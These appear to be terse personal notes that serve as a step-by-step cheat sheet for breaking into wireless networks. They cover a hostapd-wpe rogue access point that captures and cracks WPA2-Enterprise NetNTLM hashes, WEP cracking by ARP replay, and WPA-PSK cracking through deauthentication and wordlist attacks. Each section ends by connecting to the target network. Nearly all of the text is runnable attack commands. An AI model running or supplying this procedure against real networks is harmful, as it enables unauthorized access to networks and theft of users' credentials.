Wireless attacks notes
CRACKING WPA ENTERPRISE
https://systemweakness.com/defeating-wpa2-enterprise-peap-authentication-418829b8922c
1.airmon-ng start wlan0
2.airodump-ng wlan0mon
3.airmon-ng stop wlan0mon
4.nano hostapd-wpe.conf
We can also use /etc/hostapd-wpe/hostapd-wpe.conf
5.mousepad /etc/hostapd-wpe/hostapd-wpe.eap_user -- we check this afterwards
6.hostapd-wpe hostapd-wpe.conf -- then we start hostapd and, after waiting a while, obtain the hash and capture the NTLM hash
7.john --format=netntlm --wordlist=/usr/share/john/password.lst --rules <hash_file>
john --show --format=netntlm <hash_file> -- we crack the hash with this
8.mousepad filename.conf -- then we write into the configuration file
10.sudo wpa_supplicant -i wlan0 -c filename.conf -- we start this to connect to the AP
11.dhclient -v wlan0 -- connected to the internet!
CRACKING WEP
1.airmon-ng start wlan0
airodump-ng wlan0mon
2.airodump-ng -c <channel> -w filename wlan0mon
3.aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan0mon -- we perform an ARP replay attack
4.aircrack-ng filename.cap
5.nano filename.conf
6.wpa_supplicant -i wlan0 -c filename.conf -B -- connect to the AP
7.dhclient -v wlan0 -- connected to the internet!
CRACKING WPA-PSK
1.airmon-ng start wlan0
airodump-ng wlan0mon
2.airodump-ng -c <channel> -w filename wlan0mon
3.aireplay-ng -0 2 -a XX:XX:XX:XX:XX:XX wlan0mon
4.aircrack-ng filename.cap -w /usr/share/john/password.lst -0
5.nano filename.conf
6.airmon-ng stop wlan0mon
wpa_supplicant -i wlan0 -c filename.conf
7.dhclient -v wlan0 -- connected to the internet!